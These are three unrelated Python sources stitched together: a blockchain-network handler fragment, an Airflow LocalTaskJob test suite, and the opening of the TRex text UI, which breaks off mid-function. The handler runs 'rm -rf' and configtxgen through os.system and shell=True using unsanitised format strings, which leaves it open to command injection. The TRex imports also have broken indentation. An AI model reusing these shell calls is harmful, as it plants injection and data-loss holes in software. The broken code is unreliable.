        os.system('cp -r {}/configtx.yaml {}/'.format(filepath, scratch))
        call("/opt/fabric_tools/v1_4/configtxgen -printOrg %s > ../channel-artifacts/%s.json" % (mspid, org_name), shell=True)
    except Exception:
        error_msg = 'create certificate or genesis block failed!'
        logger.error(error_msg)
        raise Exception(error_msg)
    finally:
        # always leave the scratch dir before (possibly) removing it
        os.chdir(origin_dir)
    # only clean up on success, matching the original behavior
    os.system('rm -r {}'.format(scratch))
def list(self, filter_data=None):
    """List blockchain networks matching a raw mongo filter.

    :param filter_data: raw mongo query dict; defaults to match-all
    :return: serialized list of matching networks
    """
    # avoid a shared mutable default argument
    filter_data = {} if filter_data is None else filter_data
    logger.info("filter data {}".format(filter_data))
    networks = modelv2.BlockchainNetwork.objects(__raw__=filter_data)
    return self._schema(networks, many=True)
def sys_channelInfo_update(self, blockchain_network_id, peer_org_dicts):
    """POST the system-channel peer-org info of a network to the user dashboard."""
    endpoints = self.get_endpoints_list(blockchain_network_id)
    org_records = org_handler.get_by_networkid(self, blockchain_network_id)
    org_schemas = [org_handler().schema(org_handler().get_by_id(record['id']))
                   for record in org_records]
    payload = {
        "sysChannel": {
            "service_object": endpoints,
            "organizations_object": org_schemas,
            "peer_org_dicts": peer_org_dicts
        }
    }
    url = 'http://user-dashboard:8081/v2/sys_channel/{}'.format(blockchain_network_id)
    response = requests.post(url, data=json.dumps(payload),
                             headers={"Content-Type": "application/json"})
    if response.status_code == 200:
        print("update syschannel from order success")
    return
def sys_channelOrderer_update(self, blockchain_network_id, orderer_org_dicts, request_host_ports):
    """POST the system-channel orderer-org info and its host ports to the user dashboard."""
    endpoints = self.get_endpoints_list(blockchain_network_id)
    org_records = org_handler.get_by_networkid(self, blockchain_network_id)
    org_schemas = [org_handler().schema(org_handler().get_by_id(record['id']))
                   for record in org_records]
    payload = {
        "sysChannel": {
            "service_object": endpoints,
            "organizations_object": org_schemas,
            "orderer_org_dicts": orderer_org_dicts,
            "request_host_ports": request_host_ports
        }
    }
    url = 'http://user-dashboard:8081/v2/sys_channel_orderer/{}'.format(blockchain_network_id)
    response = requests.post(url, data=json.dumps(payload),
                             headers={"Content-Type": "application/json"})
    if response.status_code == 200:
        print("update syschannel from order success")
    return
def userdashboard_mongo_delete(self, blockchain_network_id):
    """Ask the user dashboard service to drop all data belonging to a network."""
    url = 'http://user-dashboard:8081/v2/resources'
    payload = {"blockchain_network_id": blockchain_network_id}
    response = requests.post(url, data=json.dumps(payload),
                             headers={"Content-Type": "application/json"})
    if response.status_code == 200:
        print("delete userdashboard Mongo datas success")
    return
def remove_network(self, network):
    """Delete a blockchain network and release everything that references it.

    Marks the network as 'deleting', detaches it from the hosts and
    organizations (peer and orderer) that reference it, deletes the model
    and finally removes the network's fabric directory from disk.

    :param network: BlockchainNetwork model instance to remove
    :raise Exception: re-raises any failure after logging it
    """
    try:
        network.update(set__status='deleting')
        # remove cluster info from host
        logger.info("remove network from host, network:{}".format(network.id))
        # if org has referenced network, remove
        for org_id in network.peer_orgs:
            peer_org = org_handler().schema(org_handler().get_by_id(org_id))
            host_id = peer_org['host_id']
            host = host_handler.get_active_host_by_id(host_id)
            host.update(pull__clusters=network.id)
            org_obj = modelv2.Organization.objects.get(id=org_id)
            org_obj.update(unset__network=network.id)
        for org_id in network.orderer_orgs:
            orderer_org = org_handler().schema(org_handler().get_by_id(org_id))
            host_id = orderer_org['host_id']
            host = host_handler.get_active_host_by_id(host_id)
            host.update(pull__clusters=network.id)
            org_obj = modelv2.Organization.objects.get(id=org_id)
            org_obj.update(unset__network=network.id)
        # delete this network's data from the user dashboard's mongo store
        # self.userdashboard_mongo_delete(network.id)
        network.delete()
        # remove the network's on-disk fabric artifacts
        filepath = '{}{}'.format(CELLO_MASTER_FABRIC_DIR, network.id)
        os.system('rm -rf {}'.format(filepath))
    except Exception as e:
        logger.error("network remove failed for {}".format(e))
        raise e
|
test_local_task_job.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import multiprocessing
import os
import time
import unittest
import uuid
from unittest import mock
import pytest
from mock import patch
from airflow import settings
from airflow.exceptions import AirflowException
from airflow.executors.sequential_executor import SequentialExecutor
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models.dag import DAG
from airflow.models.dagbag import DagBag
from airflow.models.taskinstance import TaskInstance
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.utils import timezone
from airflow.utils.net import get_hostname
from airflow.utils.session import create_session
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.test_utils.asserts import assert_queries_count
from tests.test_utils.db import clear_db_jobs, clear_db_runs
from tests.test_utils.mock_executor import MockExecutor
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TEST_DAG_FOLDER = os.environ['AIRFLOW__CORE__DAGS_FOLDER']
class TestLocalTaskJob(unittest.TestCase):
    """Tests for LocalTaskJob: heartbeat validation, double-trigger protection,
    and reaction to task state being changed externally (as from the UI)."""

    def setUp(self):
        # start from a clean jobs/runs state and stub out base_job's sleep
        clear_db_jobs()
        clear_db_runs()
        patcher = patch('airflow.jobs.base_job.sleep')
        self.addCleanup(patcher.stop)
        self.mock_base_job_sleep = patcher.start()

    def tearDown(self) -> None:
        clear_db_jobs()
        clear_db_runs()

    def test_localtaskjob_essential_attr(self):
        """
        Check whether essential attributes
        of LocalTaskJob can be assigned with
        proper values without intervention
        """
        dag = DAG(
            'test_localtaskjob_essential_attr',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})

        with dag:
            op1 = DummyOperator(task_id='op1')

        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE)
        ti = dr.get_task_instance(task_id=op1.task_id)

        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())

        essential_attr = ["dag_id", "job_type", "start_date", "hostname"]

        check_result_1 = [hasattr(job1, attr) for attr in essential_attr]
        self.assertTrue(all(check_result_1))

        check_result_2 = [getattr(job1, attr) is not None for attr in essential_attr]
        self.assertTrue(all(check_result_2))

    @patch('os.getpid')
    def test_localtaskjob_heartbeat(self, mock_pid):
        """heartbeat_callback must raise when the TI's hostname or pid don't match."""
        session = settings.Session()
        dag = DAG(
            'test_localtaskjob_heartbeat',
            start_date=DEFAULT_DATE,
            default_args={'owner': 'owner1'})

        with dag:
            op1 = DummyOperator(task_id='op1')

        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        ti = dr.get_task_instance(task_id=op1.task_id, session=session)
        ti.state = State.RUNNING
        ti.hostname = "blablabla"
        session.commit()

        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        # hostname mismatch -> heartbeat must fail
        self.assertRaises(AirflowException, job1.heartbeat_callback)

        mock_pid.return_value = 1
        ti.state = State.RUNNING
        ti.hostname = get_hostname()
        ti.pid = 1
        session.merge(ti)
        session.commit()

        # hostname and pid both match -> heartbeat passes
        job1.heartbeat_callback(session=None)

        # pid mismatch -> heartbeat must fail again
        mock_pid.return_value = 2
        self.assertRaises(AirflowException, job1.heartbeat_callback)

    @patch('os.getpid')
    def test_heartbeat_failed_fast(self, mock_getpid):
        """
        Test that task heartbeat will sleep when it fails fast
        """
        mock_getpid.return_value = 1
        self.mock_base_job_sleep.side_effect = time.sleep

        with create_session() as session:
            dagbag = DagBag(
                dag_folder=TEST_DAG_FOLDER,
                include_examples=False,
            )
            dag_id = 'test_heartbeat_failed_fast'
            task_id = 'test_heartbeat_failed_fast_op'
            dag = dagbag.get_dag(dag_id)
            task = dag.get_task(task_id)

            dag.create_dagrun(run_id="test_heartbeat_failed_fast_run",
                              state=State.RUNNING,
                              execution_date=DEFAULT_DATE,
                              start_date=DEFAULT_DATE,
                              session=session)
            ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
            ti.refresh_from_db()
            ti.state = State.RUNNING
            ti.hostname = get_hostname()
            ti.pid = 1
            session.commit()

            job = LocalTaskJob(task_instance=ti, executor=MockExecutor(do_update=False))
            job.heartrate = 2
            heartbeat_records = []
            # record each heartbeat timestamp so intervals can be checked below
            job.heartbeat_callback = lambda session: heartbeat_records.append(job.latest_heartbeat)
            job._execute()
            self.assertGreater(len(heartbeat_records), 2)
            for i in range(1, len(heartbeat_records)):
                time1 = heartbeat_records[i - 1]
                time2 = heartbeat_records[i]
                # Assert that difference small enough
                delta = (time2 - time1).total_seconds()
                self.assertAlmostEqual(delta, job.heartrate, delta=0.05)

    @pytest.mark.xfail(condition=True, reason="This test might be flaky in postgres/mysql")
    def test_mark_success_no_kill(self):
        """
        Test that ensures that mark_success in the UI doesn't cause
        the task to fail, and that the task exits
        """
        dagbag = DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_mark_success')
        task = dag.get_task('task1')

        session = settings.Session()

        dag.clear()
        dag.create_dagrun(run_id="test",
                          state=State.RUNNING,
                          execution_date=DEFAULT_DATE,
                          start_date=DEFAULT_DATE,
                          session=session)
        ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        job1 = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
        process = multiprocessing.Process(target=job1.run)
        process.start()
        ti.refresh_from_db()
        # wait (up to ~5s) for the task to actually start running
        for _ in range(0, 50):
            if ti.state == State.RUNNING:
                break
            time.sleep(0.1)
            ti.refresh_from_db()
        self.assertEqual(State.RUNNING, ti.state)
        # mark success "externally", as the UI would
        ti.state = State.SUCCESS
        session.merge(ti)
        session.commit()

        process.join(timeout=10)
        self.assertFalse(process.is_alive())
        ti.refresh_from_db()
        self.assertEqual(State.SUCCESS, ti.state)

    def test_localtaskjob_double_trigger(self):
        """A second LocalTaskJob for an already-running TI must not start a task runner."""
        dagbag = DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_localtaskjob_double_trigger')
        task = dag.get_task('test_localtaskjob_double_trigger_task')

        session = settings.Session()

        dag.clear()
        dr = dag.create_dagrun(run_id="test",
                               state=State.SUCCESS,
                               execution_date=DEFAULT_DATE,
                               start_date=DEFAULT_DATE,
                               session=session)
        # simulate a TI already running elsewhere on this host with pid 1
        ti = dr.get_task_instance(task_id=task.task_id, session=session)
        ti.state = State.RUNNING
        ti.hostname = get_hostname()
        ti.pid = 1
        session.merge(ti)
        session.commit()

        ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
        ti_run.refresh_from_db()
        job1 = LocalTaskJob(task_instance=ti_run,
                            executor=SequentialExecutor())
        from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
        with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_method:
            job1.run()
            mock_method.assert_not_called()

        # the original TI must be untouched
        ti = dr.get_task_instance(task_id=task.task_id, session=session)
        self.assertEqual(ti.pid, 1)
        self.assertEqual(ti.state, State.RUNNING)

        session.close()

    def test_localtaskjob_maintain_heart_rate(self):
        """The job should heartbeat once and exit promptly after the runner returns."""
        dagbag = DagBag(
            dag_folder=TEST_DAG_FOLDER,
            include_examples=False,
        )
        dag = dagbag.dags.get('test_localtaskjob_double_trigger')
        task = dag.get_task('test_localtaskjob_double_trigger_task')

        session = settings.Session()

        dag.clear()
        dag.create_dagrun(run_id="test",
                          state=State.SUCCESS,
                          execution_date=DEFAULT_DATE,
                          start_date=DEFAULT_DATE,
                          session=session)

        ti_run = TaskInstance(task=task, execution_date=DEFAULT_DATE)
        ti_run.refresh_from_db()
        job1 = LocalTaskJob(task_instance=ti_run,
                            executor=SequentialExecutor())

        # this should make sure we only heartbeat once and exit at the second
        # loop in _execute()
        return_codes = [None, 0]

        def multi_return_code():
            return return_codes.pop(0)

        time_start = time.time()
        from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
        with patch.object(StandardTaskRunner, 'start', return_value=None) as mock_start:
            with patch.object(StandardTaskRunner, 'return_code') as mock_ret_code:
                mock_ret_code.side_effect = multi_return_code
                job1.run()
                self.assertEqual(mock_start.call_count, 1)
                self.assertEqual(mock_ret_code.call_count, 2)
        time_end = time.time()

        self.assertEqual(self.mock_base_job_sleep.call_count, 1)
        self.assertEqual(job1.state, State.SUCCESS)

        # Consider we have patched sleep call, it should not be sleeping to
        # keep up with the heart rate in other unpatched places
        #
        # We already make sure patched sleep call is only called once
        self.assertLess(time_end - time_start, job1.heartrate)
        session.close()

    def test_mark_failure_on_failure_callback(self):
        """
        Test that ensures that mark_failure in the UI fails
        the task, and executes on_failure_callback
        """
        data = {'called': False}

        def check_failure(context):
            self.assertEqual(context['dag_run'].dag_id, 'test_mark_failure')
            data['called'] = True

        def task_function(ti):
            print("python_callable run in pid %s", os.getpid())
            with create_session() as session:
                self.assertEqual(State.RUNNING, ti.state)
                ti.log.info("Marking TI as failed 'externally'")
                ti.state = State.FAILED
                session.merge(ti)
                session.commit()

            time.sleep(60)
            # This should not happen -- the state change should be noticed and the task should get killed
            data['reached_end_of_sleep'] = True

        with DAG(dag_id='test_mark_failure', start_date=DEFAULT_DATE) as dag:
            task = PythonOperator(
                task_id='test_state_succeeded1',
                python_callable=task_function,
                on_failure_callback=check_failure)

        session = settings.Session()

        dag.clear()
        dag.create_dagrun(run_id="test",
                          state=State.RUNNING,
                          execution_date=DEFAULT_DATE,
                          start_date=DEFAULT_DATE,
                          session=session)
        ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        with timeout(30):
            # This should be _much_ shorter to run.
            # If you change this limit, make the timeout in the callable above bigger
            job1.run()

        ti.refresh_from_db()
        self.assertEqual(ti.state, State.FAILED)
        self.assertTrue(data['called'])
        self.assertNotIn('reached_end_of_sleep', data,
                         'Task should not have been allowed to run to completion')

    def test_mark_success_on_success_callback(self):
        """
        Test that ensures that where a task is marked success in the UI
        on_success_callback gets executed
        """
        data = {'called': False}

        def success_callback(context):
            self.assertEqual(context['dag_run'].dag_id,
                             'test_mark_success')
            data['called'] = True

        dag = DAG(dag_id='test_mark_success',
                  start_date=DEFAULT_DATE,
                  default_args={'owner': 'owner1'})

        task = DummyOperator(
            task_id='test_state_succeeded1',
            dag=dag,
            on_success_callback=success_callback)

        session = settings.Session()

        dag.clear()
        dag.create_dagrun(run_id="test",
                          state=State.RUNNING,
                          execution_date=DEFAULT_DATE,
                          start_date=DEFAULT_DATE,
                          session=session)
        ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
        ti.refresh_from_db()
        job1 = LocalTaskJob(task_instance=ti,
                            ignore_ti_state=True,
                            executor=SequentialExecutor())
        from airflow.task.task_runner.standard_task_runner import StandardTaskRunner
        job1.task_runner = StandardTaskRunner(job1)
        process = multiprocessing.Process(target=job1.run)
        process.start()
        ti.refresh_from_db()
        # wait (up to ~5s) for the task to actually start running
        for _ in range(0, 50):
            if ti.state == State.RUNNING:
                break
            time.sleep(0.1)
            ti.refresh_from_db()
        self.assertEqual(State.RUNNING, ti.state)
        # mark success "externally", as the UI would
        ti.state = State.SUCCESS
        session.merge(ti)
        session.commit()
        # the success callback must fire from the heartbeat
        job1.heartbeat_callback(session=None)
        self.assertTrue(data['called'])
        process.join(timeout=10)
        self.assertFalse(process.is_alive())
@pytest.fixture()
def clean_db_helper():
    """Fixture: clean the job and dag-run tables after the test runs."""
    yield
    clear_db_jobs()
    clear_db_runs()
@pytest.mark.usefixtures("clean_db_helper")
class TestLocalTaskJobPerformance:
    """Query-count regression tests for LocalTaskJob's main loop."""

    @pytest.mark.parametrize("return_codes", [[0], 9 * [None] + [0]])  # type: ignore
    @mock.patch("airflow.jobs.local_task_job.get_task_runner")
    def test_number_of_queries_single_loop(self, mock_get_task_runner, return_codes):
        """Running the job must not exceed the expected number of DB queries."""
        unique_prefix = str(uuid.uuid4())
        dag = DAG(dag_id=f'{unique_prefix}_test_number_of_queries', start_date=DEFAULT_DATE)
        task = DummyOperator(task_id='test_state_succeeded1', dag=dag)

        dag.clear()
        dag.create_dagrun(run_id=unique_prefix, state=State.NONE)

        ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)

        # NOTE(review): `side_effects` is not a Mock attribute -- this looks like a
        # typo for `side_effect`, meaning the parametrized return_codes never
        # actually drive return_code(); confirm (fixing it may change query counts).
        mock_get_task_runner.return_value.return_code.side_effects = return_codes

        job = LocalTaskJob(task_instance=ti, executor=MockExecutor())

        with assert_queries_count(12):
            job.run()
|
trex_tui.py | from __future__ import print_function
import termios
import sys
import os
import time
import threading
from collections import OrderedDict, deque
from texttable import ansi_len
import datetime
import readline
if sys.version_info > (3,0):
from io import StringIO
else:
from cStringIO import StringIO
from ..utils.text_opts import *
from ..utils.common import list_intersect
from ..utils import text_tables
from ..utils.filters import ToggleFilter
from ..common.trex_exceptions import TRexError
from ..astf.trex_astf_exceptions import ASTFErrorBadTG
class TUIQuit(Exception):
    """Raised internally to signal that the TUI should exit."""
    pass
def ascii_split(s):
    """Split *s* into lines, keeping only those with visible (ANSI-aware) content."""
    return [line for line in s.split('\n') if ansi_len(line) > 0]
class SimpleBar(object):
    """A tiny spinner that cycles through `pattern` on every show() call."""

    def __init__(self, desc, pattern):
        self.desc = desc
        self.pattern = pattern
        self.pattern_len = len(pattern)
        self.index = 0

    def show(self, buffer):
        """Print the current glyph (with optional description) and advance."""
        glyph = self.pattern[self.index]
        text = "{0} {1}".format(self.desc, glyph) if self.desc else "{0}".format(glyph)
        print(format_text(text, 'bold'), file = buffer)
        self.index = (self.index + 1) % self.pattern_len
# base type of a panel
class TrexTUIPanel(object):
    """Abstract base class for TUI panels.

    A panel renders itself into a text buffer and exposes the keyboard
    actions it supports; concrete panels must implement show() and
    get_key_actions().
    """

    def __init__ (self, mng, name):
        self.mng = mng            # owning panel manager
        self.name = name          # short panel identifier (e.g. 'dashboard')
        self.client = mng.client  # client used to fetch/render stats
        self.is_graph = False

    def show (self, buffer):
        """Render this panel into *buffer*."""
        raise NotImplementedError("must implement this")

    def get_key_actions (self):
        """Return the mapping of key -> action descriptor for this panel."""
        raise NotImplementedError("must implement this")

    def get_name (self):
        return self.name
# dashboard panel
class TrexTUIDashBoard(TrexTUIPanel):
    """Main dashboard panel: global stats plus stats for a toggleable set of ports."""

    # filter mode identifiers
    FILTER_ACQUIRED = 1
    FILTER_ALL = 2

    def __init__ (self, mng):
        super(TrexTUIDashBoard, self).__init__(mng, "dashboard")

        self.ports = self.client.get_all_ports()

        # key -> {action, legend, show[, color]} descriptors
        self.key_actions = OrderedDict()

        self.key_actions['c'] = {'action': self.action_clear, 'legend': 'clear', 'show': True}
        self.key_actions['p'] = {'action': self.action_pause, 'legend': 'pause', 'show': True, 'color': 'red'}
        self.key_actions['r'] = {'action': self.action_resume, 'legend': 'resume', 'show': True, 'color': 'blue'}

        self.key_actions['o'] = {'action': self.action_show_owned, 'legend': 'owned ports', 'show': True}
        self.key_actions['n'] = {'action': self.action_reset_view, 'legend': 'reset view', 'show': True}
        self.key_actions['a'] = {'action': self.action_show_all, 'legend': 'all ports', 'show': True}

        # register all the ports to the toggle action
        for port_id in self.ports:
            self.key_actions[str(port_id)] = {'action': self.action_toggle_port(port_id), 'legend': 'port {0}'.format(port_id), 'show': False}

        self.toggle_filter = ToggleFilter(self.ports)

        # start focused on owned ports when any are acquired
        if self.client.get_acquired_ports():
            self.action_show_owned()
        else:
            self.action_show_all()

    def get_showed_ports (self):
        """Return the ports currently selected for display."""
        return self.toggle_filter.filter_items()

    def show (self, buffer):
        self.client._show_global_stats(buffer = buffer)

        if self.get_showed_ports():
            self.client._show_port_stats(ports = self.get_showed_ports(), buffer = buffer)

    def get_key_actions (self):
        """Return only the key actions valid for the current selection/client state."""
        allowed = OrderedDict()

        allowed['n'] = self.key_actions['n']
        allowed['o'] = self.key_actions['o']
        allowed['a'] = self.key_actions['a']
        for i in self.ports:
            allowed[str(i)] = self.key_actions[str(i)]

        if self.get_showed_ports():
            allowed['c'] = self.key_actions['c']

        # if not all ports are acquired - no operations
        if not (set(self.get_showed_ports()) <= set(self.client.get_acquired_ports())):
            return allowed

        if self.client.get_mode() == 'STL':
            # if any/some ports can be resumed
            if set(self.get_showed_ports()) & set(self.client.get_paused_ports()):
                allowed['r'] = self.key_actions['r']

            # if any/some ports are transmitting - support those actions
            if set(self.get_showed_ports()) & set(self.client.get_transmitting_ports()):
                allowed['p'] = self.key_actions['p']

        return allowed

    ######### actions

    def action_pause (self):
        """Pause transmitting shown ports; errors are deliberately ignored."""
        ports = list_intersect(self.get_showed_ports(), self.client.get_transmitting_ports())

        try:
            # NOTE(review): return value is unused
            rc = self.client.pause(ports = ports)
        except TRexError:
            pass

        return ""

    def action_resume (self):
        """Resume paused shown ports; errors are deliberately ignored."""
        ports = list_intersect(self.get_showed_ports(), self.client.get_paused_ports())

        try:
            self.client.resume(ports = ports)
        except TRexError:
            pass

        return ""

    def action_reset_view (self):
        self.toggle_filter.reset()
        return ""

    def action_show_owned (self):
        self.toggle_filter.reset()
        self.toggle_filter.toggle_items(*self.client.get_acquired_ports())
        return ""

    def action_show_all (self):
        self.toggle_filter.reset()
        self.toggle_filter.toggle_items(*self.client.get_all_ports())
        return ""

    def action_clear (self):
        self.client.clear_stats(self.toggle_filter.filter_items())
        return "cleared all stats"

    def action_toggle_port(self, port_id):
        """Return a closure that toggles *port_id* in the display filter."""
        def action_toggle_port_x():
            self.toggle_filter.toggle_item(port_id)
            return ""

        return action_toggle_port_x
# streams stats
class TrexTUIStreamsStats(TrexTUIPanel):
    """Panel showing global stats plus per-stream statistics."""

    def __init__(self, mng):
        super(TrexTUIStreamsStats, self).__init__(mng, "sstats")
        self.key_actions = OrderedDict([
            ('c', {'action': self.action_clear, 'legend': 'clear', 'show': True}),
        ])

    def show(self, buffer):
        for render in (self.client._show_global_stats, self.client._show_streams_stats):
            render(buffer = buffer)

    def get_key_actions(self):
        return self.key_actions

    def action_clear(self):
        self.client.pgid_stats.clear_stats()
        return ""
# latency stats
class TrexTUILatencyStats(TrexTUIPanel):
    """STL latency panel; 'h' toggles between the stats table and the histogram."""

    def __init__(self, mng):
        super(TrexTUILatencyStats, self).__init__(mng, "lstats")
        self.is_histogram = False
        self.key_actions = OrderedDict([
            ('c', {'action': self.action_clear, 'legend': 'clear', 'show': True}),
            ('h', {'action': self.action_toggle_histogram, 'legend': 'histogram toggle', 'show': True}),
        ])

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        render = (self.client._show_latency_histogram if self.is_histogram
                  else self.client._show_latency_stats)
        render(buffer = buffer)

    def get_key_actions(self):
        return self.key_actions

    def action_toggle_histogram(self):
        self.is_histogram = not self.is_histogram
        return ""

    def action_clear(self):
        self.client.pgid_stats.clear_stats()
        return ""
class TrexTUIAstfTrafficStats(TrexTUIPanel):
    """Scrollable panel for ASTF traffic stats, browsable per template group."""

    def __init__(self, mng):
        super(TrexTUIAstfTrafficStats, self).__init__(mng, "astats")
        self.start_row = 0
        # 16 rows are reserved for the panels above and below this one
        self.max_lines = TrexTUI.MIN_ROWS - 16
        self.num_lines = 0
        self.tgid = 0
        self.is_sum = bool(self.client.is_dynamic)
        self.key_actions = OrderedDict([
            ('c',     {'action': self.action_clear, 'legend': 'clear', 'show': Predicate(lambda : self.tgid == 0)}),
            ('Up',    {'action': self.action_up, 'legend': 'scroll up', 'show': True}),
            ('Down',  {'action': self.action_down, 'legend': 'scroll down', 'show': True}),
            ('Left',  {'action': self.action_left, 'legend': 'previous TG', 'show': True}),
            ('Right', {'action': self.action_right, 'legend': 'next TG', 'show': True}),
        ])

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        scratch = StringIO()
        rendered = False
        try:
            self.client._show_traffic_stats(False, buffer = scratch, tgid = self.tgid, is_sum = self.is_sum)
            rendered = True
        except ASTFErrorBadTG:
            # the selected template group vanished - fall back to the summary
            self.tgid = 0
        if rendered:
            scratch.seek(0)
            all_lines = scratch.readlines()
            self.num_lines = len(all_lines)
            window = all_lines[self.start_row:self.start_row + self.max_lines]
            buffer.write(''.join(window))
            buffer.write('\n')

    def get_key_actions(self):
        return self.key_actions

    def action_clear(self):
        self.client.clear_stats()
        return ""

    def action_up(self):
        if self.start_row > self.num_lines:
            # clamp after the content shrank
            self.start_row = self.num_lines
        elif self.start_row > 0:
            self.start_row -= 1

    def action_down(self):
        if self.start_row < self.num_lines - self.max_lines:
            self.start_row += 1

    def action_left(self):
        if self.tgid > 0:
            self.tgid -= 1

    def action_right(self):
        if self.tgid < self.client._get_num_of_tgids():
            self.tgid += 1
# ASTF latency stats
class TrexTUIAstfLatencyStats(TrexTUIPanel):
    """ASTF latency panel; 'v' cycles through the available latency views."""

    def __init__(self, mng):
        super(TrexTUIAstfLatencyStats, self).__init__(mng, 'lstats')
        self.key_actions = OrderedDict()
        self.key_actions['v'] = {'action': self.action_toggle_view, 'legend': self.get_next_view, 'show': True}
        self.views = [
            {'name': 'main latency', 'func': self.client._show_latency_stats},
            {'name': 'histogram', 'func': self.client._show_latency_histogram},
            {'name': 'counters', 'func': self.client._show_latency_counters},
        ]
        self.view_index = 0
        self.next_view_index = 1

    def get_next_view(self):
        """Legend text advertising which view 'v' switches to next."""
        return "view toggle to '%s'" % self.views[self.next_view_index]['name']

    def show(self, buffer):
        self.client._show_global_stats(buffer = buffer)
        current = self.views[self.view_index]
        current['func'](buffer = buffer)

    def get_key_actions(self):
        return self.key_actions

    def action_toggle_view(self):
        # advance both indices in lockstep (RHS evaluated before assignment)
        self.view_index, self.next_view_index = (
            self.next_view_index, (1 + self.next_view_index) % len(self.views))
        return ""
# utilization stats
class TrexTUIUtilizationStats(TrexTUIPanel):
    """Panel showing CPU and mbuf utilization beneath the global stats."""

    def __init__(self, mng):
        super(TrexTUIUtilizationStats, self).__init__(mng, "ustats")
        self.key_actions = {}

    def show(self, buffer):
        for render in (self.client._show_global_stats,
                       self.client._show_cpu_util,
                       self.client._show_mbuf_util):
            render(buffer = buffer)

    def get_key_actions(self):
        return self.key_actions
# log
class TrexTUILog():
    """Simple in-memory event log rendered at the bottom of the TUI."""

    def __init__(self):
        self.log = []

    def add_event(self, msg):
        """Append *msg* to the log, timestamped with the current wall-clock time."""
        stamp = str(datetime.datetime.now().time())
        self.log.append("[{0}] {1}".format(stamp, msg))

    def show(self, buffer, max_lines = 4):
        """Print the newest *max_lines* entries to *buffer*."""
        first = max(len(self.log) - max_lines, 0)
        print(format_text("\nLog:", 'bold', 'underline'), file = buffer)
        for entry in self.log[first:]:
            print(entry, file = buffer)
# a predicate to wrap function as a bool
class Predicate(object):
    """Wraps a zero-argument callable so it can be evaluated in boolean context."""

    def __init__(self, func):
        self.func = func

    def __nonzero__(self):
        # Python 2 truthiness hook
        return bool(self.func())

    def __bool__(self):
        # Python 3 truthiness hook
        return bool(self.func())
# Panels manager (contains server panels)
class TrexTUIPanelManager():
    """Owns the TUI panels, the global key bindings and the legend line.

    Global keys (quit / panel switching) live in `key_actions`; the
    currently active panel contributes its own bindings through its
    `get_key_actions()` method.
    """

    def __init__(self, tui):
        self.tui = tui
        self.client = tui.client
        self.ports = self.client.get_all_ports()
        self.locked = False

        self.panels = {}
        self.panels['dashboard'] = TrexTUIDashBoard(self)
        self.panels['ustats'] = TrexTUIUtilizationStats(self)

        self.key_actions = OrderedDict()

        # we allow console only when ports are acquired
        self.key_actions['ESC'] = {'action': self.action_none, 'legend': 'console', 'show': Predicate(lambda : not self.locked)}

        self.key_actions['q'] = {'action': self.action_none, 'legend': 'quit', 'show': True}
        self.key_actions['d'] = {'action': self.action_show_dash, 'legend': 'dashboard', 'show': True}
        self.key_actions['u'] = {'action': self.action_show_ustats, 'legend': 'util', 'show': True}

        # HACK - FIX THIS
        # mode specific panels
        if self.client.get_mode() == "STL":
            self.panels['sstats'] = TrexTUIStreamsStats(self)
            self.panels['lstats'] = TrexTUILatencyStats(self)
            self.key_actions['s'] = {'action': self.action_show_sstats, 'legend': 'streams', 'show': True}
            self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}
        elif self.client.get_mode() == "ASTF":
            self.panels['astats'] = TrexTUIAstfTrafficStats(self)
            self.panels['lstats'] = TrexTUIAstfLatencyStats(self)
            self.key_actions['t'] = {'action': self.action_show_astats, 'legend': 'astf', 'show': True}
            self.key_actions['l'] = {'action': self.action_show_lstats, 'legend': 'latency', 'show': True}

        # start with dashboard
        self.main_panel = self.panels['dashboard']

        # log object
        self.log = TrexTUILog()

        self.generate_legend()

        self.conn_bar = SimpleBar('status: ', ['|', '/', '-', '\\'])
        self.dis_bar = SimpleBar('status: ', ['X', ' '])
        self.show_log = False

    def _render_actions(self, actions):
        """Format one key->action table into a legend fragment.

        Deduplicates the two identical loops the original generate_legend
        carried for the global and per-panel tables.
        """
        fragment = ''
        for key, info in actions.items():
            if not info['show']:
                continue

            # 'legend' is either a plain string or a callable producing one
            try:
                legend = info['legend']()
            except TypeError:
                legend = info['legend']

            entry = "'{0}' - {1}, ".format(key, legend)
